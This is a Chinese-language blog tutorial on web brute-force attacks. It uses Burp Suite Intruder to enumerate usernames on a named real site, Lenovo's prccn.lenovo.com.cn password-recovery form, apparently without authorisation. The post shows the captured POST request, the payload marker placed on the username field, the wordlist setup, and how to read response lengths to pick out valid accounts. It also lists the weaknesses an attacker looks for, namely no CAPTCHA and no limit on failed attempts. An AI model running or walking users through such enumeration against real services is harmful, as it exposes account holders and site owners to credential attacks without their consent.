您的位置:首页 > 博客中心 > 互联网 >

暴力破解攻击

时间:2022-04-28 21:34

接下来,单独讲一下暴力破解,这个在渗透测试的时候,也是非常重要的入侵手段。

 

在此,我只讲一下关于web方面的暴力破解,其他如:主机,防火墙,数据库等等的暴力破解,就不讲了,大家可以自行百度,自行学习,一定得养成独立自学的习惯,遇到问题,再去解决,即,带着疑问去找答案,而不是填鸭式的学一些东西,其实,这算是王爽老师的话,分享给大家。

 

burpsuite-intruder介绍

 

大家可以自学我一位朋友的关于burpsuite的系列教程,百度:angelc0de,你就会找到他。

 

burpsuite-Intruder:一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。

 

虽然说的比较复杂,但是,我们只学习他的暴力破解功能,其他不管。

 

例1, 联想prccn站取回密码处,暴力猜解该站用户名,如图:

 

猜解前提:

 

1、 无验证码或者验证码可绕过

2、 未限制错误次数

技术分享

恰好,这里同时满足这两个条件。

 

输入用户名:1111111

 

使用burpsuite截获请求包

技术分享

POST /ReturnPassword.aspx HTTP/1.1

Host: prccn.lenovo.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 256

 

__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=1111111&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81

 

接着,Ctrl+i,将该intercept下面的数据包复制到intruder下面,如图:

技术分享

此时,intruder下就有与intercept下同样的一份数据包了

 

现在,我们来clear掉所有褐色,然后,使用add将该txtUserName=1111111键值对标上助记符,最后,加载wordlist字典让intruder来为我们进行暴力猜解该用户名。

 

如图所示:

技术分享

POST /ReturnPassword.aspx HTTP/1.1

Host: prccn.lenovo.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://prccn.lenovo.com.cn/ReturnPassword.aspx

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 256

 

__VIEWSTATE=%2FwEPDwUKMTQ1ODE5NjEyN2Rk4UgFzyIJtSxr8zmCTv0qudqDpkytH3f%2BYk4FsSjl1%2Fc%3D&__EVENTVALIDATION=%2FwEWAwL8idWZCQKl1bKzCQLMhpebCsEkqhVg3t9tyhEHNgwdZH23HhfLGWf%2Bt55btyAaJJMp&txtUserName=§1111111§&btnSendPassword=%E5%8F%96%E5%9B%9E%E5%AF%86%E7%A0%81

 

看到了吗,我们要猜解的用户名1111111,已经被$助记符标记上了。

 

接下来,加载我们的worldlist用户名字典,如图:

 

Playloads标签下面,选择Playload type,选择Runtime file,选择Select file,最后,选择我们的worldlist用户名字典

技术分享

字典加载完成后,在菜单栏找到intruder标签,选择Start attack,intruder就开始为我们暴力猜解了。

 

如图所示:

技术分享

几分钟后,intruder猜解完成

技术分享

嘿嘿,看下Length字段,是否有别具一格的数据包长度。

 

Length=2482(目测是猜解成功的用户名)

技术分享

试试呗,输入:aaa

技术分享

看来不是,继续查看其他长度的数据包

技术分享

输入:alex试试

技术分享

还是错误,算了,不试了,其实,还有更精确的查找法,可以看看angelc0de的系列教程,在此,不再赘述。

本类排行

今日推荐

热门手游